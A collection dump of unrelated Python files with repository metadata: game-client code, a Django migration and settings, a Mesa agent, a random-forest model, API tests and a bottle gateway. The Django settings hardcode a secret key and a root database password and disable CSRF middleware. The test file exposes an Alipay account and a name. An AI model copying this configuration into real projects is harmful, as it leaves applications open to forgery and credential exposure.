self.dropIntervals[generation, objNum].finish()
def finishAllDropIntervals(self):
if hasattr(self, 'dropIntervals'):
for dropInterval in self.dropIntervals.values():
dropInterval.finish()
    def setGenerations(self, generations):
        """Sync the local generation table with the server's (id, timestamp32, numPlayers) list."""
        self.notify.info('setGenerations(%s)' % (generations,))
        gen2t = {}
        gen2nt = {}
        gen2np = {}
        for id, timestamp32, numPlayers in generations:
            # convert the 32-bit network timestamp into activity-local time
            gen2t[id] = globalClockDelta.networkToLocalTime(timestamp32, bits=32) - self._startTimestamp
            gen2nt[id] = timestamp32
            gen2np[id] = numPlayers
        ids = self._id2gen.keys()
        for id in ids:
            if id not in gen2t:
                self._removeGeneration(id)
        for id in gen2t:
            if id not in self._id2gen:
                self._addGeneration(id, gen2t[id], gen2nt[id], gen2np[id])
    def scheduleDrops(self, genId = None):
        """Build the deterministic drop schedule for a generation (idempotent per generation).

        The RNG is seeded from the generation id, presumably so every client
        computes an identical schedule without further network traffic -- TODO confirm.
        """
        if genId is None:
            genId = self.getCurGeneration()
        gen = self._id2gen[genId]
        if gen.hasBeenScheduled:
            return
        # pick which fruit this time window uses, rotating through the list
        fruitIndex = int((gen.startTime + 0.5 * self.DropPeriod) / PartyGlobals.CatchActivityDuration)
        fruitNames = ['apple',
         'orange',
         'pear',
         'coconut',
         'watermelon',
         'pineapple']
        fruitName = fruitNames[fruitIndex % len(fruitNames)]
        rng = RandomNumGen(genId + self._generationSeedBase)
        gen.droppedObjNames = [fruitName] * self.numFruits + ['anvil'] * self.numAnvils
        rng.shuffle(gen.droppedObjNames)
        dropPlacer = PartyRegionDropPlacer(self, gen.numPlayers, genId, gen.droppedObjNames, startTime=gen.startTime)
        gen.numItemsDropped = 0
        # if we joined mid-window, skip the portion of the schedule that already elapsed
        tIndex = gen.startTime % PartyGlobals.CatchActivityDuration
        tPercent = float(tIndex) / PartyGlobals.CatchActivityDuration
        gen.numItemsDropped += dropPlacer.skipPercent(tPercent)
        while not dropPlacer.doneDropping(continuous=True):
            nextDrop = dropPlacer.getNextDrop()
            gen.dropSchedule.append(nextDrop)
        gen.hasBeenScheduled = True
        return
    def startDropTask(self):
        """Begin per-frame scheduling of falling objects (see dropTask)."""
        taskMgr.add(self.dropTask, self.DropTaskName)
    def stopDropTask(self):
        """Stop the per-frame drop scheduling task."""
        taskMgr.remove(self.DropTaskName)
    def _scheduleGenerations(self):
        """Advance to the newest generation whose start time has passed, scheduling drops lazily."""
        curT = self.getCurrentCatchActivityTime()
        genIndex = self._orderedGenerationIndex
        newGenIndex = genIndex
        while genIndex is None or genIndex < len(self._orderedGenerations) - 1:
            if genIndex is None:
                nextGenIndex = 0
            else:
                nextGenIndex = genIndex + 1
            nextGenId = self._orderedGenerations[nextGenIndex]
            nextGen = self._id2gen[nextGenId]
            startT = nextGen.startTime
            if curT >= startT:
                newGenIndex = nextGenIndex
                if not nextGen.hasBeenScheduled:
                    # constants depend on player count, which can differ per generation
                    self.defineConstants(forceNumPlayers=nextGen.numPlayers)
                    self.scheduleDrops(genId=self._orderedGenerations[nextGenIndex])
            genIndex = nextGenIndex
        self._orderedGenerationIndex = newGenIndex
        return
    def dropTask(self, task):
        """Per-frame task: start the drop interval for every scheduled drop that is now due."""
        self._scheduleGenerations()
        curT = self.getCurrentCatchActivityTime()
        if self._orderedGenerationIndex is not None:
            i = self._orderedGenerationIndex
            genIndex = self._orderedGenerations[i]
            gen = self._id2gen[genIndex]
            while len(gen.dropSchedule) > 0 and gen.dropSchedule[0][0] < curT:
                drop = gen.dropSchedule[0]
                gen.dropSchedule = gen.dropSchedule[1:]
                dropTime, objName, dropCoords = drop
                objNum = gen.numItemsDropped
                x, y = self.grid2world(*dropCoords)
                dropIval = self.getDropIval(x, y, objName, genIndex, objNum)

                def cleanup(generation, objNum, self = self):
                    del self.dropIntervals[generation, objNum]

                dropIval.append(Func(Functor(cleanup, genIndex, objNum)))
                self.dropIntervals[genIndex, objNum] = dropIval
                gen.numItemsDropped += 1
                # start partway through so late starts stay in sync with the schedule
                dropIval.start(curT - dropTime)
                self._lastDropTime = dropTime
        return Task.cont
    def getDropIval(self, x, y, dropObjName, generation, num):
        """Build the full interval for one falling object at stage position (x, y).

        The interval parents the drop node, ramps in a ground shadow, animates
        the object falling (by trajectory or lerp), and cleans up afterwards.
        """
        objType = PartyGlobals.Name2DropObjectType[dropObjName]
        id = (generation, num)
        dropNode = hidden.attachNewNode('catchDropNode%s' % (id,))
        dropNode.setPos(x, y, 0)
        shadow = self.dropShadow.copyTo(dropNode)
        shadow.setZ(PartyGlobals.CatchDropShadowHeight)
        shadow.setColor(1, 1, 1, 1)
        object = self.getObjModel(dropObjName)
        object.reparentTo(hidden)
        # randomize heading; watermelons/anvils only wobble around their base heading
        if dropObjName in ['watermelon', 'anvil']:
            objH = object.getH()
            absDelta = {'watermelon': 12,
             'anvil': 15}[dropObjName]
            delta = (self.randomNumGen.random() * 2.0 - 1.0) * absDelta
            newH = objH + delta
        else:
            newH = self.randomNumGen.random() * 360.0
        object.setH(newH)
        sphereName = 'FallObj%s' % (id,)
        radius = self.ObjRadius
        if objType.good:
            # good objects get a slightly larger catch sphere
            radius *= lerp(1.0, 1.3, 0.5)
        collSphere = CollisionSphere(0, 0, 0, radius)
        collSphere.setTangible(0)
        collNode = CollisionNode(sphereName)
        collNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
        collNode.addSolid(collSphere)
        collNodePath = object.attachNewNode(collNode)
        collNodePath.hide()
        if self.ShowObjSpheres:
            collNodePath.show()
        catchEventName = 'ltCatch' + sphereName

        def eatCollEntry(forward, collEntry):
            forward()

        self.accept(catchEventName, Functor(eatCollEntry, Functor(self.__handleCatch, id[0], id[1])))
        def cleanup(self = self, dropNode = dropNode, id = id, event = catchEventName):
            self.ignore(event)
            dropNode.removeNode()
        duration = objType.fallDuration
        onscreenDuration = objType.onscreenDuration
        targetShadowScale = 0.3
        if self.trickShadows:
            # grow the shadow quickly while the object is still offscreen, then slowly
            intermedScale = targetShadowScale * (self.OffscreenTime / self.BaselineDropDuration)
            shadowScaleIval = Sequence(LerpScaleInterval(shadow, self.OffscreenTime, intermedScale, startScale=0))
            shadowScaleIval.append(LerpScaleInterval(shadow, duration - self.OffscreenTime, targetShadowScale, startScale=intermedScale))
        else:
            shadowScaleIval = LerpScaleInterval(shadow, duration, targetShadowScale, startScale=0)
        targetShadowAlpha = 0.4
        shadowAlphaIval = LerpColorScaleInterval(shadow, self.OffscreenTime, Point4(1, 1, 1, targetShadowAlpha), startColorScale=Point4(1, 1, 1, 0))
        shadowIval = Parallel(shadowScaleIval, shadowAlphaIval)
        if self.useGravity:

            def setObjPos(t, objType = objType, object = object):
                z = objType.trajectory.calcZ(t)
                object.setZ(z)

            setObjPos(0)
            dropIval = LerpFunctionInterval(setObjPos, fromData=0, toData=onscreenDuration, duration=onscreenDuration)
        else:
            startPos = Point3(0, 0, self.MinOffscreenHeight)
            object.setPos(startPos)
            dropIval = LerpPosInterval(object, onscreenDuration, Point3(0, 0, 0), startPos=startPos, blendType='easeIn')
        ival = Sequence(Func(Functor(dropNode.reparentTo, self.root)), Parallel(Sequence(WaitInterval(self.OffscreenTime), Func(Functor(object.reparentTo, dropNode)), dropIval), shadowIval), Func(cleanup), name='drop%s' % (id,))
        if objType == PartyGlobals.Name2DropObjectType['anvil']:
            ival.append(Func(self.playAnvil))
        return ival
    def playAnvil(self):
        """Play the anvil-landing sound, but only if the local toon is playing."""
        if base.localAvatar.doId in self.toonIds:
            base.playSfx(self.sndAnvilLand)
    def initOrthoWalk(self):
        """Set up orthographic (top-down) walking for the catch game."""
        DistributedPartyCatchActivity.notify.debug('startOrthoWalk')

        def doCollisions(oldPos, newPos, self = self):
            # clamp movement to the playfield rectangle
            x = bound(newPos[0], self.StageHalfWidth, -self.StageHalfWidth)
            y = bound(newPos[1], self.StageHalfHeight, -self.StageHalfHeight)
            newPos.setX(x)
            newPos.setY(y)
            return newPos

        # NOTE(review): doCollisions is defined but never passed to OrthoDrive,
        # so the clamping above is dead code here -- possibly lost in decompilation;
        # verify against the original source before changing.
        orthoDrive = OrthoDrive(self.ToonSpeed, instantTurn=True)
        self.orthoWalk = OrthoWalk(orthoDrive, broadcast=True)
    def destroyOrthoWalk(self):
        """Stop and release the ortho-walk controller, if it was created."""
        DistributedPartyCatchActivity.notify.debug('destroyOrthoWalk')
        if hasattr(self, 'orthoWalk'):
            self.orthoWalk.stop()
            self.orthoWalk.destroy()
            del self.orthoWalk
    def startIdle(self):
        """FSM hook for entering the Idle state (no setup needed)."""
        DistributedPartyCatchActivity.notify.debug('startIdle')
    def finishIdle(self):
        """FSM hook for leaving the Idle state (no teardown needed)."""
        DistributedPartyCatchActivity.notify.debug('finishIdle')
    def startActive(self):
        """FSM hook: begin gameplay -- reset score, start drops, and place the local toon."""
        DistributedPartyCatchActivity.notify.debug('startActive')
        for avId in self.toonIds:
            if self.toonSDs.has_key(avId):
                toonSD = self.toonSDs[avId]
                toonSD.enter()
                toonSD.fsm.request('normal')
        self.fruitsCaught = 0
        self.dropIntervals = {}
        self.startDropTask()
        if base.localAvatar.doId in self.toonIds:
            self.putLocalAvatarInActivity()
    def finishActive(self):
        """FSM hook: end gameplay -- stop drops, cancel intervals, and release the local toon."""
        DistributedPartyCatchActivity.notify.debug('finishActive')
        self.stopDropTask()
        if hasattr(self, 'finishIval'):
            self.finishIval.pause()
            del self.finishIval
        if base.localAvatar.doId in self.toonIds:
            self.takeLocalAvatarOutOfActivity()
        for ival in self.dropIntervals.values():
            ival.finish()
        del self.dropIntervals
    def startConclusion(self):
        """FSM hook: show the end-of-game text ('perfect' if every fruit was caught)."""
        DistributedPartyCatchActivity.notify.debug('startConclusion')
        for avId in self.toonIds:
            if self.toonSDs.has_key(avId):
                toonSD = self.toonSDs[avId]
                toonSD.fsm.request('notPlaying')
        self.destroyCatchCollisions()
        if base.localAvatar.doId not in self.toonIds:
            return
        else:
            self.localToonExiting()
        if self.fruitsCaught >= self.numFruits:
            finishText = TTLocalizer.PartyCatchActivityFinishPerfect
        else:
            finishText = TTLocalizer.PartyCatchActivityFinish
        perfectTextSubnode = hidden.attachNewNode(self.__genText(finishText))
        perfectText = hidden.attachNewNode('perfectText')
        perfectTextSubnode.reparentTo(perfectText)
        # vertically center the text on its parent node
        frame = self.__textGen.getCardActual()
        offsetY = -abs(frame[2] + frame[3]) / 2.0
        perfectTextSubnode.setPos(0, 0, offsetY)
        perfectText.setColor(1, 0.1, 0.1, 1)

        def fadeFunc(t, text = perfectText):
            text.setColorScale(1, 1, 1, t)

        def destroyText(text = perfectText):
            text.removeNode()

        # zoom/fade the text in, hold, zoom/fade out, then destroy it
        textTrack = Sequence(Func(perfectText.reparentTo, aspect2d), Parallel(LerpScaleInterval(perfectText, duration=0.5, scale=0.3, startScale=0.0), LerpFunctionInterval(fadeFunc, fromData=0.0, toData=1.0, duration=0.5)), Wait(2.0), Parallel(LerpScaleInterval(perfectText, duration=0.5, scale=1.0), LerpFunctionInterval(fadeFunc, fromData=1.0, toData=0.0, duration=0.5, blendType='easeIn')), Func(destroyText), WaitInterval(0.5))
        soundTrack = SoundInterval(self.sndPerfect)
        self.finishIval = Parallel(textTrack, soundTrack)
        self.finishIval.start()
    def finishConclusion(self):
        """FSM hook: leave the conclusion state and return the local toon to walking."""
        DistributedPartyCatchActivity.notify.debug('finishConclusion')
        if base.localAvatar.doId in self.toonIds:
            self.takeLocalAvatarOutOfActivity()
            base.cr.playGame.getPlace().fsm.request('walk')
    def showJellybeanReward(self, earnedAmount, jarAmount, message):
        """Show the jellybean reward screen, or go straight back to walking if nothing was earned."""
        if earnedAmount > 0:
            DistributedPartyActivity.showJellybeanReward(self, earnedAmount, jarAmount, message)
        else:
            base.cr.playGame.getPlace().fsm.request('walk')
| [
"sweep14@gmail.com"
] | sweep14@gmail.com |
79db1164483eabbbb076982b18db98b693436ece | ce0ee5277f5f9ea329c9839d35e3dca678391d17 | /news/migrations/0006_auto_20150103_2203.py | f95b2846b907b240b31cd41a547ddd4ae0e2249a | [] | no_license | legaultmarc/genomenews | 8e4c7831c01695fad15da45149aaea5cb7c39f7d | 1df77322c9f0f619cf9a2e7aecabd9d7b7b097b0 | refs/heads/master | 2020-04-26T11:37:42.857970 | 2015-01-17T02:19:55 | 2015-01-17T02:19:55 | 25,890,263 | 0 | 0 | null | 2015-03-02T18:44:54 | 2014-10-28T21:10:14 | Python | UTF-8 | Python | false | false | 430 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: gives the news.User 'karma' field an
    # explicit integer default of 0.
    dependencies = [
        ('news', '0005_auto_20150103_0112'),
    ]
    operations = [
        migrations.AlterField(
            model_name='user',
            name='karma',
            field=models.IntegerField(default=0),
            preserve_default=True,
        ),
    ]
| [
"emmanuel.noutahi@hotmail.ca"
] | emmanuel.noutahi@hotmail.ca |
b9e0b57a5c9666a499ad84824d4b81f20d1bb26f | 4cd7c74ba3562ed233c485c6913a3446ff4bd96f | /agents/active_agent.py | 86a8f29c1ec56c6ff9b93d74e868c97114c6ede6 | [] | no_license | melyamri/woa | 994a0b47040f33dc50139d1f638664c52f34559e | 48419be95e327144de35294afd1e1785126e56e1 | refs/heads/master | 2021-01-23T01:01:45.707062 | 2017-06-05T14:55:52 | 2017-06-05T14:55:52 | 85,864,570 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | from agents.custom_agent import CustomAgent
from controllers.task_manager import TaskManager
from controllers.rule_manager import RuleManager
from objectives.simple_objective import SimpleObjective
import os
class ActiveAgent(CustomAgent):
    """A mobile agent that pursues objectives handed out by quest-giver agents."""

    # Grid coordinates; left unset here and populated externally -- TODO confirm.
    x = None
    y = None

    def __init__(self, position, model):
        super().__init__(position, model)
        # every agent starts with the lowest-priority default objective
        self.objective = SimpleObjective()
        self.quest_giver = None

    def log(self, text):
        """Append *text* to the model log, keeping only the 5 most recent entries."""
        self.model.log.append(text)
        self.model.log = self.model.log[-5:]

    def get_portrayal(self):
        """Return the visualization descriptor used to draw this agent on the grid."""
        return {
            "Shape": "circle",
            "r": 1,
            "Color": "black",
            "Layer": 1,
            "Filled": "true"
        }

    def add_objective(self, objective, quest_giver):
        """Adopt *objective* from *quest_giver* if it outranks the current one."""
        if self.objective.priority < objective.priority:
            self.objective = objective
            self.quest_giver = quest_giver

    def execute_task(self, task):
        """Delegate execution of *task* to the TaskManager."""
        TaskManager.execute(task, self)

    def decide(self):
        """Run the rule engine to pick this agent's next action."""
        RuleManager.reason(self)

    def step(self):
        """Mesa scheduler hook: one simulation step is one decision."""
        self.decide()

    def class_name(self):
        # NOTE(review): reports the parent class's name; looks intentional
        # (other code compares against these strings) -- confirm before changing.
        return "CustomAgent"

    def _get_object_id(f):
        # NOTE(review): unusual signature (no self) preserved for compatibility.
        return "CustomAgent"

    def has_complex_objective(self):
        """Return True when the current objective is anything other than SimpleObjective."""
        # BUG FIX: the original compared against the misspelled
        # "simplebbjective", which never matched, so this always returned True.
        return self.objective.class_name().lower() != "simpleobjective"
"viktor@jacynycz.es"
] | viktor@jacynycz.es |
6068d949bec5e2a7286acf091a3bdeadea3277ff | 8f99dd67ca5b5222ef74fe5c80e605afcb1bc99c | /pymlb/learning/RandomForestContinuousModel.py | 940b9c6a79b1008ecfcdb2553d6fbb78ebdeded1 | [] | no_license | sangpark/deepball | 96f09c6da3c281384e7119aaf4647a1e028f8a25 | 730d70ca6efe498395e62e2b5892ce704b1dd160 | refs/heads/master | 2021-09-06T21:38:10.830797 | 2018-02-11T22:55:58 | 2018-02-11T22:55:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,314 | py | from pymlb.data import SequenceMatrices
from pymlb.learning import Model
from typing import Dict
from os.path import isfile
import pickle
import numpy as np
from sklearn.ensemble import RandomForestRegressor
class RandomForestContinuousModel(Model):
    """Random-forest regression model over flattened sequence matrices.

    One independent RandomForestRegressor is trained per output key; inputs
    are all "in_"-prefixed matrices concatenated along the last axis.
    """
    def __init__(self, key_counts: Dict[str, int], file_name: str = None, **kwargs):
        """Create the model; optionally load a previously saved one from *file_name*."""
        super().__init__(key_counts=key_counts)
        self.model = None
        self.estimators = kwargs.pop("estimators", 20)
        self.preprocessing = {"interaction_order": kwargs.pop("interaction_order", 1),
                              "recursive_timestep_distance": kwargs.pop("recursive_timestep_distance", 1)}
        if file_name is not None and isfile(file_name):
            self.import_model(file_name)
    def save(self, file_name):
        """Pickle the trained model dictionary to *file_name*."""
        with open(file_name, 'wb') as file:
            pickle.dump(self.model, file)
    def import_model(self, file_name: str):
        """Load a pickled model from *file_name*; silently no-op if the file is missing."""
        if isfile(file_name):
            with open(file_name, 'rb') as file:
                self.model = pickle.load(file)
            # restore the preprocessing settings the model was trained with
            if "preprocessing" in self.model:
                self.preprocessing = self.model["preprocessing"]
    def train(self, matrices: SequenceMatrices, *args, **kwargs):
        """Fit one RandomForestRegressor per "out_" key on the flattened matrices."""
        self.model = {
            "preprocessing": self.preprocessing,
            "estimators": self.estimators,
            "outputs": {},
            "input_modification": {}
        }
        modified_matrices, sample_weights = matrices.flatten_all(missing_value_replacement=0, **self.preprocessing)
        # concatenate each set of inputs and outputs into one big input matrix
        input_matrix = np.concatenate(
            [matrix for key, matrix in sorted(modified_matrices.items()) if key.startswith("in_")], axis=-1)
        # # standardize the input values
        # input_means = np.mean(input_matrix, axis=0, keepdims=True)
        # self.model["input_modification"]["mean"] = input_means
        # input_stddevs = np.std(input_matrix, axis=0, keepdims=True) + 0.00001  # use this epsilon so we don't get NaNs
        # input_matrix = (input_matrix - input_means) / input_stddevs
        # create the model for each output entry
        model = {}
        for key, output_matrix in modified_matrices.items():
            if not key.startswith("out_"):
                continue
            model[key] = RandomForestRegressor(n_estimators=self.estimators, n_jobs=-1, max_features=0.333, verbose=1)
            model[key].fit(input_matrix, output_matrix, sample_weights[key])
        self.model["outputs"] = model
    def predict(self, matrices: SequenceMatrices, intermediate_layer: str = None, *args, **kwargs):
        """Evaluate every output regressor (or just *intermediate_layer*) on *matrices*.

        Returns a dict of output key -> prediction array; the time dimension is
        restored when the input had one.
        """
        if intermediate_layer is not None and intermediate_layer not in self.model["outputs"]:
            return {}
        time_dimension = matrices.get_max_sequence_length()
        modified_matrices, sample_weights = matrices.flatten_all(remove_zero_samples=False,
                                                                 missing_value_replacement=0, **self.preprocessing)
        # concatenate each set of inputs and outputs into one big input matrix
        input_matrix = np.concatenate(
            [matrix for key, matrix in sorted(modified_matrices.items()) if key.startswith("in_")], axis=-1)
        # evaluate the regression for each output
        results = {}
        for key, model in self.model["outputs"].items():
            if not key.startswith("out_") or (intermediate_layer is not None and key != intermediate_layer):
                continue
            results[key] = model.predict(input_matrix)
            # restore the time dimension
            if time_dimension is not None:
                results[key] = np.reshape(results[key], (-1, time_dimension, results[key].shape[-1]))
        return results
    def summary(self, *args, **kwargs):
        """Not implemented: would report per-output model information."""
        # for each layer and output stat, output the model weights
        pass
    def input_gradients(self, sample_data: Dict[str, np.ndarray], feature_index: int, timestep_index: int,
                        output_name: str):
        """Gradients are not defined for random forests."""
        raise NotImplementedError
    def feature_gradients(self, sample_data: SequenceMatrices, layer_name: str, output_name: str):
        """Gradients are not defined for random forests."""
        raise NotImplementedError
| [
"dcalzad2@illinois.edu"
] | dcalzad2@illinois.edu |
4e6fbac8f8f71e065e2d9cc2501cba95fc32e1cb | d3c81d65d24b04745b3306419ff6d4151a2a22db | /django_project/django_project/settings.py | a620a8bb15b68c59ceaa8c13780f1c131da2a56d | [] | no_license | bianQ/begin | 88b2950057bfddb76c5859ce2089317b806ca6b1 | b94a80cdb32c38ed625dc24a8bf7872c6ff8d2ac | refs/heads/master | 2021-01-24T08:20:41.996011 | 2016-12-15T13:45:19 | 2016-12-15T13:45:19 | 69,145,608 | 4 | 1 | null | 2016-10-31T02:09:37 | 2016-09-25T05:27:22 | Python | UTF-8 | Python | false | false | 3,683 | py | """
Django settings for the django_project project.

Generated by 'django-admin startproject' using Django 1.10.1.

For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source control; rotate it and load it
# from the environment before any production deployment.
SECRET_KEY = 'i(j^1)a7%obaef6&r_r!9y$!_c6amp72qu6it*yia58133xv6s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog'
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    # SECURITY NOTE: CSRF protection is disabled below; POST forms are
    # unprotected against cross-site request forgery. Re-enable when possible.
    #'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_project.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'django_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# NOTE(review): credentials are hardcoded; prefer environment variables.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        #'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
        'HOST': '192.168.1.103',
        'USER': 'root',
        'PASSWORD': 'root',
        'NAME': 'django',
        'CHARSET': 'utf8'
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'collectstatic')
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, "static"),
)
LOGIN_URL = '/blog/login/'
DOMAIN = 'http://127.0.0.1:8000'
# Outgoing mail over SSL; the password comes from the PASSWORD env var.
EMAIL_HOST = 'smtp.163.com'
EMAIL_HOST_USER = '15989490620@163.com'
EMAIL_HOST_PASSWORD = os.environ.get('PASSWORD')
EMAIL_PORT = 465
EMAIL_USE_SSL = True
BAIDU_MAP_KEY = os.environ.get('BAIDUMAPAK') | [
"vagaab@foxmail.com"
] | vagaab@foxmail.com |
afd81f81f1f1b883587446ae90c0eef7fe9119b6 | 7d02813987b49c2a69d92b9b2fdf5148af37274f | /case/Recommend/testAccountBind.py | bfa36a597587e27610642247da283901f0f4eb06 | [] | no_license | xgh321324/api_test | 29e01cbe5f0b7c2df25fb7e781cedf8031140c72 | 2575495baac3ab90adab7a7a85904c38a78dd4b7 | refs/heads/master | 2022-07-23T19:54:39.320828 | 2022-07-02T09:13:35 | 2022-07-02T09:13:35 | 129,185,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,803 | py | #coding:utf-8
from common.login_lanting import auto_login_by_UID
import requests,unittest,time,json
from common.logger import Log
from common.Hash import get_digit,get_sign
from common.Excel import Excel_util
class Account(unittest.TestCase):
    """API tests for binding/unbinding the withdrawal (payout) account."""
    @classmethod
    def setUpClass(cls):
        # shared HTTP session, auth token, and request headers for all tests
        cls.s = requests.session()
        cls.to = auto_login_by_UID()
        cls.header = {'User-Agent': 'PelvicFloorPersonal/4.1.1 (iPad; iOS 10.1.1; Scale/2.00)',
                      'Accept-Encoding': 'gzip, deflate',
                      'Accept-Language': 'zh-Hans-CN;q=1',
                      'Content-Type': 'application/json',
                      'requestApp': '2',
                      'requestclient': '2',
                      'versionForApp': '4.4.0',
                      'Authorization': 'Basic YXBpTGFudGluZ0BtZWRsYW5kZXIuY29tOkFwaVRobWxkTWxkQDIwMTM=',
                      'Connection': 'keep-alive'
                      }
        cls.log = Log()
        # NOTE(review): cls.excel is never used in this class; the hardcoded
        # Windows path also makes the suite machine-specific.
        cls.excel = Excel_util(r'C:\Users\Administrator\Desktop\Interface_testcase.xls')
    def test_bind_account01(self):
        u'Bind a withdrawal (Alipay) account.'
        self.log.info('开始测试绑定账号接口..')
        url = 'http://api-rec.sunnycare.cc/v1/account/bind'
        json_data = {
            'token': self.to,
            'timestamp': str(int(time.time())),
            'alipay_account': '2088012687108144',
            'real_name': '许广会',
            'nick_name': '许广会',
            'nonce': get_digit()
        }
        json_data['sign'] = get_sign(json_data)
        r = self.s.post(url,headers = self.header,json=json_data)
        self.log.info('绑定支付宝返回:%s' % r.json())
        # assertions
        self.assertEqual(200,r.json()['code'],msg='返回状态码不是200')
        self.assertEqual('请求成功',r.json()['note'])
        self.log.info('绑定账号接口测试结束!\n')
    def test_bind_account02(self):
        u'Unbind the withdrawal account.'
        self.log.info('开始测试解除绑定账号接口..')
        url = 'http://api-rec.sunnycare.cc/v1/account/unbind'
        json_data = {
            'token': self.to,
            'timestamp': str(int(time.time())),
            'type': '0',  # 0 = Alipay; 1 = WeChat
            'nonce': get_digit()
        }
        json_data['sign'] = get_sign(json_data)
        r = self.s.post(url,headers = self.header,json=json_data)
        self.log.info('解除绑定支付宝返回:%s' % r.json())
        # assertions
        self.assertEqual(200,r.json()['code'],msg='返回状态码不是200')
        self.assertEqual('请求成功',r.json()['note'])
        self.log.info('解除绑定账号接口测试结束!\n')
    @classmethod
    def tearDownClass(cls):
        # release the shared HTTP session
        cls.s.close()
if __name__=='__main__':
    # Allow running this suite directly: python testAccountBind.py
    unittest.main()
| [
"34511103+xgh321324@users.noreply.github.com"
] | 34511103+xgh321324@users.noreply.github.com |
3711e6424cfd6ae391004f0cee24c8d5f0f81eaf | 2e7970e72e583b6e52cd2dc3b58fbb4a0437d610 | /web/restful_api/gateway_lib.py | f10821c4d6b672cbf9ae951dec1af103274b4ffc | [] | no_license | Lyoncore/iotivity-demo-uc15 | dedc25821f672a0b7ea0096fb9acd5651fa7a8e8 | 33d0d377f433029371403415f695226dad46349e | refs/heads/master | 2021-04-06T00:00:54.981699 | 2016-08-02T06:30:25 | 2016-08-02T06:30:25 | 64,462,533 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,575 | py | import socket
import math
import decimal
import time
from bottle import route, request, run
print 'create socket'
# Persistent TCP connection to the local gateway daemon; every route
# handler below multiplexes its 64-byte reads/writes over this one socket.
clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting to local gateway ...'
clientsock.connect(("127.0.0.1", 6655))
print 'Connected'
def read_data(data):
data = data.ljust(64)
#print data
clientsock.send(data)
value = clientsock.recv(64)
#print value
if not value:
print 'connection closed'
return None
else:
status = value.lstrip().rstrip()
#print status
return status
def send_data(name, value):
    """Write a name/value pair as two fixed 32-byte fields (64 bytes total)."""
    message = name.ljust(32) + value.ljust(32)
    clientsock.send(message)
@route('/raspberrypi2/')
def list_device_p():
    """Index route for the Raspberry Pi 2 device tree."""
    return "For raspberrypi2 control"
@route('/raspberrypi2/temperature', method='GET')
def read_temp_p():
    """GET /raspberrypi2/temperature — temperature reading from the Pi."""
    return read_data('sensor_p_temp')
@route('/raspberrypi2/humidity', method='GET')
def read_humidity_p():
    """GET /raspberrypi2/humidity — humidity reading from the Pi."""
    return read_data('sensor_p_humidity')
@route('/raspberrypi2/light', method='GET')
def read_light_p():
    """GET /raspberrypi2/light — light-sensor reading from the Pi."""
    return read_data('sensor_p_light')
@route('/raspberrypi2/sound', method='GET')
def read_sound_p():
    """GET /raspberrypi2/sound — sound-sensor reading from the Pi."""
    return read_data('sensor_p_sound')
@route('/raspberrypi2/led_red', method='GET')
def read_led_p_red():
    """GET /raspberrypi2/led_red — read the red LED, or set it via ?value=."""
    value = request.query.value
    if value:
        send_data('led_p_red', value)
    else:
        return read_data('led_p_red')
@route('/raspberrypi2/led_green', method='GET')
def read_led_p_green():
    """GET /raspberrypi2/led_green — read the green LED, or set it via ?value=."""
    value = request.query.value
    if value:
        send_data('led_p_green', value)
    else:
        return read_data('led_p_green')
@route('/raspberrypi2/led_blue', method='GET')
def read_led_p_blue():
    """GET /raspberrypi2/led_blue — read the blue LED, or set it via ?value=."""
    value = request.query.value
    if value:
        send_data('led_p_blue', value)
    else:
        return read_data('led_p_blue')
@route('/raspberrypi2/lcd', method='GET')
def read_lcd_p():
    """GET /raspberrypi2/lcd — read the Pi LCD text, or set it via ?value=."""
